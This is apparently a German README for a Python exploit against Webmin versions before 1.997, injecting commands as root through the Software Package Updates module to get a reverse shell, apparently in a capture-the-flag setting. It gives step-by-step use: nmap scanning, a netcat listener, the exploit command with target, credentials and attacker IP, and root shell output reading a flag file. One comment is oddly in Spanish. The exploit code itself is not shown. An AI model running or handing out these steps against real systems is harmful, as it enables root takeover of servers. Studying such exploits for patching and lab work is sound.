
Authentifizierter Remote-Code-Execution-Exploit für Webmin < 1.997 über das Modul für Software-Paketupdates. Injiziert beliebige Befehle als Root über einen nicht bereinigten Parameter und liefert eine Reverse Shell.
Exploit für die Remote-Code-Ausführungsschwachstelle in Webmin-Versionen vor 1.997 über das Modul Software Package Updates.
Das Modul Software Package Updates von Webmin bereinigt den Parameter u nicht korrekt, bevor er an das System übergeben wird. Ein authentifizierter Benutzer mit Zugriff auf dieses Modul kann beliebige Befehle injizieren, die als root ausgeführt werden.
Installiere die Abhängigkeiten, bevor du den Exploit ausführst:
pip3 install requests beautifulsoup4 lxml urllib3
| Parameter | Beschreibung | Beispiel |
|---|
-t | URL des Zielsystems (ohne Port) | https://192.168.1.10 |
-u | Webmin-Benutzer | admin |
-p | Webmin-Passwort | password123 |
-l | Deine IP (wo du die Shell empfängst) | 192.168.1.5 |
-lp | Port, auf dem du lauschst | 4444 |
1 — Identifiziere die IP des Zielsystems mit Nmap:
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin
2 — Öffne den Listener auf deiner Maschine:
nc -lvnp 4444
3 — Führe den Exploit in einem anderen Terminal aus:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — Wenn der Exploit erfolgreich ist, siehst du:
5 — Auf dem Listener erhältst du eine Shell als root:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444